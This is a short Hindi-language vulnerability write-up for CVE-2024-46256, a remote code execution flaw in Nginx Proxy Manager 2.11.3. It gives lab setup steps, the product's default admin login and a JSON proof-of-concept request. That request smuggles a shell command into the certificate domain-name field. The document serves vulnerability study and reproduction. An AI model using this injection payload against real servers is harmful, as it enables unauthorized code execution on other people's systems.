CVE-2024-46256 Nginx Proxy Manager RCE भेद्यता विश्लेषण
वातावरण सेटअप
1. Nginx Proxy Manager 2.11.3 वातावरण चलाएँ
या आप स्वचालित स्क्रिप्ट का उपयोग कर सकते हैं:
python setup_environment.py
2. Nginx Proxy Manager तक पहुँचें
- URL: http://localhost:81
- प्रारंभिक सेटअप पूरा करने के बाद परीक्षण करें
- डिफ़ॉल्ट व्यवस्थापक खाते से लॉगिन करें (ईमेल: [email protected] / पासवर्ड: changeme)
- प्रमाणपत्र जारी करने से संबंधित सुविधाओं तक पहुँच की अनुमति सत्यापित करें
भेद्यता जानकारी
- CVE ID: CVE-2024-46256
- उत्पाद: Nginx Proxy Manager
- संस्करण: 2.11.3
- भेद्यता प्रकार: Remote Code Execution (RCE)
- CVSS: उच्च
PoC कोड
PoC प्रमाणित उपयोगकर्ता द्वारा प्रमाणपत्र जारी करने (जैसे Let's Encrypt) अनुरोध प्रक्रिया में डोमेन नाम फ़ील्ड में टेम्पलेट/कमांड इंजेक्शन करके RCE का कारण बनता है।
उदाहरण पेलोड (अवधारणा उदाहरण):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
विश्लेषण वातावरण
- OS: Windows 10
- Docker: नवीनतम संस्करण
- Nginx Proxy Manager: 2.11.3